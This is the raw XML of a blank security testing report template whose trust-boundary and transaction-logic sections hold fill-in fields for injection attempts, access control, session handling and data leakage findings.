                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Workflow &amp; Logic Impact Tested?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21FCBDB3" w14:textId="1054F024" w:rsidR="00DB1BCC" w:rsidRDefault="001F5E9E" w:rsidP="001C333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1F5E9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Disruptions in Business Logic Identified?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1C3333" w:rsidRPr="001C3333" w14:paraId="539A31C3" w14:textId="77777777" w:rsidTr="00597FC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C06F52E" w14:textId="50912F14" w:rsidR="001C3333" w:rsidRPr="001C3333" w:rsidRDefault="009C294C" w:rsidP="00597F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Additional </w:t>
            </w:r>
            <w:r w:rsidR="001C3333" w:rsidRPr="001C3333">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Test Results for Handling of Incomplete Input</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41F8D31B" w14:textId="77777777" w:rsidR="001C3333" w:rsidRPr="001C3333" w:rsidRDefault="001C3333" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="199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1C79425" w14:textId="77777777" w:rsidR="001C3333" w:rsidRPr="001C3333" w:rsidRDefault="001C3333" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="199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08B010B" w14:textId="77777777" w:rsidR="001C3333" w:rsidRPr="001C3333" w:rsidRDefault="001C3333" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19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FB3E647" w14:textId="77777777" w:rsidR="001C3333" w:rsidRPr="001C3333" w:rsidRDefault="001C3333" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19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396161F" w14:textId="77777777" w:rsidR="001C3333" w:rsidRPr="001C3333" w:rsidRDefault="001C3333" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19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FDB856A" w14:textId="77777777" w:rsidR="001C3333" w:rsidRPr="001C3333" w:rsidRDefault="001C3333" w:rsidP="001C333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C294C" w:rsidRPr="001C3333" w14:paraId="38BC3F73" w14:textId="77777777" w:rsidTr="00597FC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F48F591" w14:textId="2CF2B179" w:rsidR="009C294C" w:rsidRDefault="00943966" w:rsidP="00597F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43966">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b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7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78CC37D5" w14:textId="77777777" w:rsidR="009C294C" w:rsidRPr="00943966" w:rsidRDefault="00943966" w:rsidP="009C2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94396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[*Improper Input Validation, Unhandled Exceptions, Information Disclosure, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4868D4FC" w14:textId="77777777" w:rsidR="00943966" w:rsidRDefault="00943966" w:rsidP="009C2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D01CA57" w14:textId="505FC6A0" w:rsidR="00943966" w:rsidRPr="001C3333" w:rsidRDefault="00943966" w:rsidP="009C294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C3333" w:rsidRPr="001C3333" w14:paraId="738D3010" w14:textId="77777777" w:rsidTr="00597FC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D73E23A" w14:textId="77777777" w:rsidR="001C3333" w:rsidRPr="001C3333" w:rsidRDefault="001C3333" w:rsidP="00597F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C3333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41BAA37C" w14:textId="77777777" w:rsidR="001C3333" w:rsidRPr="001C3333" w:rsidRDefault="001C3333" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="198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01EB2C6" w14:textId="77777777" w:rsidR="001C3333" w:rsidRPr="001C3333" w:rsidRDefault="001C3333" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19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4BD30E5" w14:textId="77777777" w:rsidR="001C3333" w:rsidRPr="001C3333" w:rsidRDefault="001C3333" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19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909884D" w14:textId="77777777" w:rsidR="001C3333" w:rsidRPr="001C3333" w:rsidRDefault="001C3333" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19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DBEB3E9" w14:textId="77777777" w:rsidR="001C3333" w:rsidRPr="001C3333" w:rsidRDefault="001C3333" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19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808C57E" w14:textId="77777777" w:rsidR="001C3333" w:rsidRPr="001C3333" w:rsidRDefault="001C3333" w:rsidP="001C333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E699B" w:rsidRPr="001C3333" w14:paraId="4A047BC2" w14:textId="77777777" w:rsidTr="00597FCE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6A8F432" w14:textId="45AB37EF" w:rsidR="007E699B" w:rsidRPr="001C3333" w:rsidRDefault="007E699B" w:rsidP="00597FC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Results Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5713D3B5" w14:textId="77777777" w:rsidR="007E699B" w:rsidRDefault="007E699B" w:rsidP="007E699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7D3E36C" w14:textId="77777777" w:rsidR="007E699B" w:rsidRDefault="007E699B" w:rsidP="007E699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5CC203B" w14:textId="77777777" w:rsidR="007E699B" w:rsidRDefault="007E699B" w:rsidP="007E699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7AE63EF" w14:textId="77777777" w:rsidR="007E699B" w:rsidRDefault="007E699B" w:rsidP="007E699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AAD00CD" w14:textId="77777777" w:rsidR="007E699B" w:rsidRPr="001C3333" w:rsidRDefault="007E699B" w:rsidP="007E699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7ACF475C" w14:textId="77777777" w:rsidR="00AB1DD4" w:rsidRDefault="00AB1DD4" w:rsidP="008E517A">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left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D24A21" w:rsidRPr="00A51A96" w14:paraId="201B63C0" w14:textId="77777777" w:rsidTr="00125582">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="498C22AF" w14:textId="264A4B07" w:rsidR="00D24A21" w:rsidRPr="003C713F" w:rsidRDefault="00D24A21" w:rsidP="005232C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11.4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860F44" w:rsidRPr="00860F44">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Test Trust Boundaries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="19801A85" w14:textId="77777777" w:rsidR="007E699B" w:rsidRPr="00125582" w:rsidRDefault="007E699B" w:rsidP="008E517A">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left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1E2AE0" w:rsidRPr="001E2AE0" w14:paraId="2B3C55CE" w14:textId="77777777" w:rsidTr="0086261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7125BE5" w14:textId="77777777" w:rsidR="001E2AE0" w:rsidRPr="001E2AE0" w:rsidRDefault="001E2AE0" w:rsidP="0086261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E2AE0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65C3A7B" w14:textId="77777777" w:rsidR="001E2AE0" w:rsidRPr="001E2AE0" w:rsidRDefault="001E2AE0" w:rsidP="001E2A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E2AE0" w:rsidRPr="001E2AE0" w14:paraId="69BDF371" w14:textId="77777777" w:rsidTr="0086261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4B48080" w14:textId="77777777" w:rsidR="001E2AE0" w:rsidRPr="001E2AE0" w:rsidRDefault="001E2AE0" w:rsidP="0086261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E2AE0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BB27EF9" w14:textId="77777777" w:rsidR="001E2AE0" w:rsidRPr="001E2AE0" w:rsidRDefault="001E2AE0" w:rsidP="001E2A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E2AE0" w:rsidRPr="001E2AE0" w14:paraId="73C77599" w14:textId="77777777" w:rsidTr="0086261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7311FDA" w14:textId="77777777" w:rsidR="001E2AE0" w:rsidRPr="001E2AE0" w:rsidRDefault="001E2AE0" w:rsidP="0086261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E2AE0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29FB3F3" w14:textId="77777777" w:rsidR="001E2AE0" w:rsidRPr="001E2AE0" w:rsidRDefault="001E2AE0" w:rsidP="001E2A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E2AE0" w:rsidRPr="001E2AE0" w14:paraId="2C284389" w14:textId="77777777" w:rsidTr="0086261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5F76664" w14:textId="77777777" w:rsidR="001E2AE0" w:rsidRPr="001E2AE0" w:rsidRDefault="001E2AE0" w:rsidP="0086261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E2AE0">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Functions Tested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F1FF540" w14:textId="77777777" w:rsidR="001E2AE0" w:rsidRPr="001E2AE0" w:rsidRDefault="001E2AE0" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="200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81079CE" w14:textId="77777777" w:rsidR="001E2AE0" w:rsidRPr="001E2AE0" w:rsidRDefault="001E2AE0" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20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B1DC0B5" w14:textId="77777777" w:rsidR="001E2AE0" w:rsidRPr="001E2AE0" w:rsidRDefault="001E2AE0" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20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F76B6AB" w14:textId="77777777" w:rsidR="001E2AE0" w:rsidRPr="001E2AE0" w:rsidRDefault="001E2AE0" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20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84AB2F0" w14:textId="77777777" w:rsidR="001E2AE0" w:rsidRPr="001E2AE0" w:rsidRDefault="001E2AE0" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20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4BF5B8F" w14:textId="77777777" w:rsidR="001E2AE0" w:rsidRPr="001E2AE0" w:rsidRDefault="001E2AE0" w:rsidP="001E2A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F73EE" w:rsidRPr="001E2AE0" w14:paraId="2F6B7DD3" w14:textId="77777777" w:rsidTr="0086261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6FA9A3C" w14:textId="0CF87EAA" w:rsidR="000F73EE" w:rsidRPr="001E2AE0" w:rsidRDefault="005732E0" w:rsidP="0086261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732E0"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 Trust Boundaries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BCF0C65" w14:textId="77777777" w:rsidR="000F73EE" w:rsidRPr="002B7590" w:rsidRDefault="005732E0" w:rsidP="000F73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B759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2B7590" w:rsidRPr="002B7590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Client-Server, API-Backend, Third-Party Integrations, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24142938" w14:textId="77777777" w:rsidR="002B7590" w:rsidRDefault="002B7590" w:rsidP="000F73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B7FBD70" w14:textId="77777777" w:rsidR="002B7590" w:rsidRDefault="002B7590" w:rsidP="000F73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6FBA811" w14:textId="0A03DCED" w:rsidR="00862616" w:rsidRPr="001E2AE0" w:rsidRDefault="00862616" w:rsidP="000F73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03132" w:rsidRPr="001E2AE0" w14:paraId="7F0F3375" w14:textId="77777777" w:rsidTr="0086261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86A2BB7" w14:textId="735D5403" w:rsidR="00703132" w:rsidRPr="005732E0" w:rsidRDefault="00703132" w:rsidP="0086261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03132">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Injection Attacks Attempted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D12D447" w14:textId="77777777" w:rsidR="00703132" w:rsidRDefault="00703132" w:rsidP="000F73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70313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SQLi, XSS, Command Injection,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6038FF7" w14:textId="77777777" w:rsidR="00703132" w:rsidRDefault="00703132" w:rsidP="000F73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D33B75F" w14:textId="77777777" w:rsidR="00703132" w:rsidRDefault="00703132" w:rsidP="000F73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CF0E69E" w14:textId="77777777" w:rsidR="00862616" w:rsidRDefault="00862616" w:rsidP="000F73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C1BBC2E" w14:textId="74B81D21" w:rsidR="00862616" w:rsidRPr="002B7590" w:rsidRDefault="00862616" w:rsidP="000F73E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1E2AE0" w:rsidRPr="001E2AE0" w14:paraId="6EF639C7" w14:textId="77777777" w:rsidTr="0086261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FB3964B" w14:textId="77777777" w:rsidR="001E2AE0" w:rsidRPr="001E2AE0" w:rsidRDefault="001E2AE0" w:rsidP="0086261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E2AE0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Does the Application Allows Users to Access Certain Resources Based on their Identity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47998593" w14:textId="77777777" w:rsidR="001E2AE0" w:rsidRPr="001E2AE0" w:rsidRDefault="001E2AE0" w:rsidP="001E2AE0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1E2AE0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67A6396F" w14:textId="77777777" w:rsidR="001E2AE0" w:rsidRPr="001E2AE0" w:rsidRDefault="001E2AE0" w:rsidP="001E2AE0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1E2AE0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1E2AE0" w:rsidRPr="001E2AE0" w14:paraId="57E4612E" w14:textId="77777777" w:rsidTr="0086261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7137B0E" w14:textId="77777777" w:rsidR="001E2AE0" w:rsidRPr="001E2AE0" w:rsidRDefault="001E2AE0" w:rsidP="0086261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E2AE0">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Does the Application Allows Users to Access Higher Privileged Functions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4164BA5A" w14:textId="77777777" w:rsidR="001E2AE0" w:rsidRPr="001E2AE0" w:rsidRDefault="001E2AE0" w:rsidP="001E2AE0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1E2AE0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504DE8AF" w14:textId="77777777" w:rsidR="001E2AE0" w:rsidRPr="001E2AE0" w:rsidRDefault="001E2AE0" w:rsidP="001E2AE0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1E2AE0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BD12CF" w:rsidRPr="001E2AE0" w14:paraId="794E54F9" w14:textId="77777777" w:rsidTr="0086261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58B2F8D" w14:textId="163ABB74" w:rsidR="00BD12CF" w:rsidRPr="001E2AE0" w:rsidRDefault="00BD12CF" w:rsidP="0086261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D12CF">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Data Leakage Detected Across Boundaries?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086EF4E7" w14:textId="77777777" w:rsidR="00BD12CF" w:rsidRPr="00FB1FCB" w:rsidRDefault="00BD12CF" w:rsidP="00BD12CF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FB1FCB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FB1FCB" w:rsidRPr="00FB1FCB">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Yes/No, Sensitive Information Identified?]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="148E8CA5" w14:textId="77777777" w:rsidR="00FB1FCB" w:rsidRDefault="00FB1FCB" w:rsidP="00BD12CF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  <w:p w14:paraId="25006034" w14:textId="77777777" w:rsidR="00FB1FCB" w:rsidRDefault="00FB1FCB" w:rsidP="00BD12CF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  <w:p w14:paraId="27801FBD" w14:textId="1BC3E24B" w:rsidR="00A43357" w:rsidRPr="001E2AE0" w:rsidRDefault="00A43357" w:rsidP="00BD12CF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C56EDB" w:rsidRPr="001E2AE0" w14:paraId="5D174CD7" w14:textId="77777777" w:rsidTr="0086261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536596C" w14:textId="4A6BB8B3" w:rsidR="00C56EDB" w:rsidRPr="00BD12CF" w:rsidRDefault="00C56EDB" w:rsidP="0086261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56EDB">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Improper Input Validation Found?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34878712" w14:textId="77777777" w:rsidR="00C56EDB" w:rsidRDefault="00774C88" w:rsidP="00BD12CF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Pr="00774C88">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Yes/No, Affected Interfaces/Endpoints</w:t>
            </w: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431367A1" w14:textId="77777777" w:rsidR="00774C88" w:rsidRDefault="00774C88" w:rsidP="00BD12CF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742662E2" w14:textId="77777777" w:rsidR="00774C88" w:rsidRDefault="00774C88" w:rsidP="00BD12CF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11113B29" w14:textId="78FE6A13" w:rsidR="00A43357" w:rsidRPr="00FB1FCB" w:rsidRDefault="00A43357" w:rsidP="00BD12CF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F87076" w:rsidRPr="001E2AE0" w14:paraId="0ACB631C" w14:textId="77777777" w:rsidTr="0086261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21849C8" w14:textId="2A5F85A3" w:rsidR="00F87076" w:rsidRPr="00C56EDB" w:rsidRDefault="00F87076" w:rsidP="0086261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87076">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Unauthorized API Access Possible?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71422AA7" w14:textId="77777777" w:rsidR="00F87076" w:rsidRDefault="00F87076" w:rsidP="00BD12CF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Pr="00F87076">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Yes/No, User Roles Tested, Results</w:t>
            </w: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387B68E6" w14:textId="77777777" w:rsidR="00F87076" w:rsidRDefault="00F87076" w:rsidP="00BD12CF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12AD86D5" w14:textId="77777777" w:rsidR="00F87076" w:rsidRDefault="00F87076" w:rsidP="00BD12CF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68D33CAB" w14:textId="3A68EB57" w:rsidR="00A43357" w:rsidRDefault="00A43357" w:rsidP="00BD12CF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C4341E" w:rsidRPr="001E2AE0" w14:paraId="544939B8" w14:textId="77777777" w:rsidTr="0086261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9EC2703" w14:textId="23432012" w:rsidR="00C4341E" w:rsidRPr="00F87076" w:rsidRDefault="00C4341E" w:rsidP="0086261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4341E">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Session Handling Weaknesses Identified?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58E7236C" w14:textId="77777777" w:rsidR="00C4341E" w:rsidRDefault="00C4341E" w:rsidP="00BD12CF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Pr="00C4341E">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Session Fixation, Token Reuse, Manipulation, etc.</w:t>
            </w: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570C1EFE" w14:textId="77777777" w:rsidR="00C4341E" w:rsidRDefault="00C4341E" w:rsidP="00BD12CF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5BF768BA" w14:textId="77777777" w:rsidR="00C4341E" w:rsidRDefault="00C4341E" w:rsidP="00BD12CF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33A1766E" w14:textId="141E1769" w:rsidR="00A43357" w:rsidRDefault="00A43357" w:rsidP="00BD12CF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2956C4" w:rsidRPr="001E2AE0" w14:paraId="1F1375C7" w14:textId="77777777" w:rsidTr="0086261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33D5DFF" w14:textId="6759AC9B" w:rsidR="002956C4" w:rsidRPr="00C4341E" w:rsidRDefault="002956C4" w:rsidP="0086261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956C4">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Third-Party API Integration Risks Detected?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01825825" w14:textId="77777777" w:rsidR="002956C4" w:rsidRDefault="002956C4" w:rsidP="00BD12CF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Pr="002956C4">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Insecure Calls, Improper Data Validation, etc.</w:t>
            </w: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37CF6CFE" w14:textId="77777777" w:rsidR="002956C4" w:rsidRDefault="002956C4" w:rsidP="00BD12CF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7B1B5728" w14:textId="77777777" w:rsidR="002956C4" w:rsidRDefault="002956C4" w:rsidP="00BD12CF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744BE815" w14:textId="3FD2FE7C" w:rsidR="00A43357" w:rsidRDefault="00A43357" w:rsidP="00BD12CF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1E2AE0" w:rsidRPr="001E2AE0" w14:paraId="64615655" w14:textId="77777777" w:rsidTr="0086261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F711938" w14:textId="168DBC01" w:rsidR="001E2AE0" w:rsidRPr="001E2AE0" w:rsidRDefault="00FD1982" w:rsidP="0086261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Other </w:t>
            </w:r>
            <w:r w:rsidR="001E2AE0" w:rsidRPr="001E2AE0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Vulnerabilities</w:t>
            </w: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 Identified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0E16EAE" w14:textId="77777777" w:rsidR="001E2AE0" w:rsidRPr="001E2AE0" w:rsidRDefault="001E2AE0" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="202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35FF46F" w14:textId="77777777" w:rsidR="001E2AE0" w:rsidRPr="001E2AE0" w:rsidRDefault="001E2AE0" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20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3311D64" w14:textId="77777777" w:rsidR="001E2AE0" w:rsidRPr="001E2AE0" w:rsidRDefault="001E2AE0" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20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E4161B8" w14:textId="77777777" w:rsidR="001E2AE0" w:rsidRPr="001E2AE0" w:rsidRDefault="001E2AE0" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20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D4E81E5" w14:textId="77777777" w:rsidR="001E2AE0" w:rsidRPr="001E2AE0" w:rsidRDefault="001E2AE0" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20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7DA14EB" w14:textId="77777777" w:rsidR="001E2AE0" w:rsidRPr="001E2AE0" w:rsidRDefault="001E2AE0" w:rsidP="001E2A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E2AE0" w:rsidRPr="001E2AE0" w14:paraId="34A4CC3F" w14:textId="77777777" w:rsidTr="0086261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539E85A" w14:textId="77777777" w:rsidR="001E2AE0" w:rsidRPr="001E2AE0" w:rsidRDefault="001E2AE0" w:rsidP="0086261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E2AE0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99386A3" w14:textId="77777777" w:rsidR="001E2AE0" w:rsidRPr="001E2AE0" w:rsidRDefault="001E2AE0" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="201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BA0C8B2" w14:textId="77777777" w:rsidR="001E2AE0" w:rsidRPr="001E2AE0" w:rsidRDefault="001E2AE0" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20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2403851" w14:textId="77777777" w:rsidR="001E2AE0" w:rsidRPr="001E2AE0" w:rsidRDefault="001E2AE0" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20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4BD6B98" w14:textId="77777777" w:rsidR="001E2AE0" w:rsidRPr="001E2AE0" w:rsidRDefault="001E2AE0" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20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1D57CEA" w14:textId="77777777" w:rsidR="001E2AE0" w:rsidRPr="001E2AE0" w:rsidRDefault="001E2AE0" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20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625D68D" w14:textId="77777777" w:rsidR="001E2AE0" w:rsidRPr="001E2AE0" w:rsidRDefault="001E2AE0" w:rsidP="001E2A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5C9B0F6A" w14:textId="77777777" w:rsidR="009B742B" w:rsidRDefault="009B742B" w:rsidP="009B742B">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D2C80">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Results Analysis: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AB386A" w14:textId="77777777" w:rsidR="009B742B" w:rsidRPr="00B07F1E" w:rsidRDefault="009B742B" w:rsidP="009B742B">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b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742B" w:rsidRPr="005D2C80" w14:paraId="2D8040F0" w14:textId="77777777" w:rsidTr="005232C4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AA00B5C" w14:textId="77777777" w:rsidR="009B742B" w:rsidRPr="005D2C80" w:rsidRDefault="009B742B" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="08E07B87" w14:textId="77777777" w:rsidR="009B742B" w:rsidRPr="005D2C80" w:rsidRDefault="009B742B" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="26EF98E0" w14:textId="77777777" w:rsidR="009B742B" w:rsidRDefault="009B742B" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="50C89101" w14:textId="77777777" w:rsidR="009B742B" w:rsidRDefault="009B742B" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="396FC614" w14:textId="77777777" w:rsidR="009B742B" w:rsidRDefault="009B742B" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="100ECAA1" w14:textId="77777777" w:rsidR="009B742B" w:rsidRDefault="009B742B" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="22804267" w14:textId="77777777" w:rsidR="009B742B" w:rsidRPr="005D2C80" w:rsidRDefault="009B742B" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5BD52B3B" w14:textId="77777777" w:rsidR="00860F44" w:rsidRDefault="00860F44" w:rsidP="009B742B">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left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494F9B" w:rsidRPr="00A51A96" w14:paraId="21855EFC" w14:textId="77777777" w:rsidTr="00AE30E9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="64B226BF" w14:textId="2CC4CAA7" w:rsidR="00494F9B" w:rsidRPr="003C713F" w:rsidRDefault="00494F9B" w:rsidP="005232C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11.5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CC4D94" w:rsidRPr="00CC4D94">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Test Transaction Logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7EDE222B" w14:textId="77777777" w:rsidR="009B742B" w:rsidRPr="00AE30E9" w:rsidRDefault="009B742B" w:rsidP="009B742B">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left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FA1AAF" w:rsidRPr="00FA1AAF" w14:paraId="3E259DA7" w14:textId="77777777" w:rsidTr="00AE30E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D702C37" w14:textId="77777777" w:rsidR="00FA1AAF" w:rsidRPr="00FA1AAF" w:rsidRDefault="00FA1AAF" w:rsidP="00AE30E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A1AAF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35CE764" w14:textId="77777777" w:rsidR="00FA1AAF" w:rsidRPr="00FA1AAF" w:rsidRDefault="00FA1AAF" w:rsidP="00FA1AA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A1AAF" w:rsidRPr="00FA1AAF" w14:paraId="2AF81955" w14:textId="77777777" w:rsidTr="00AE30E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41DDD98" w14:textId="77777777" w:rsidR="00FA1AAF" w:rsidRPr="00FA1AAF" w:rsidRDefault="00FA1AAF" w:rsidP="00AE30E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A1AAF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8CAE676" w14:textId="77777777" w:rsidR="00FA1AAF" w:rsidRPr="00FA1AAF" w:rsidRDefault="00FA1AAF" w:rsidP="00FA1AA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A1AAF" w:rsidRPr="00FA1AAF" w14:paraId="25610C3C" w14:textId="77777777" w:rsidTr="00AE30E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AF08AE7" w14:textId="77777777" w:rsidR="00FA1AAF" 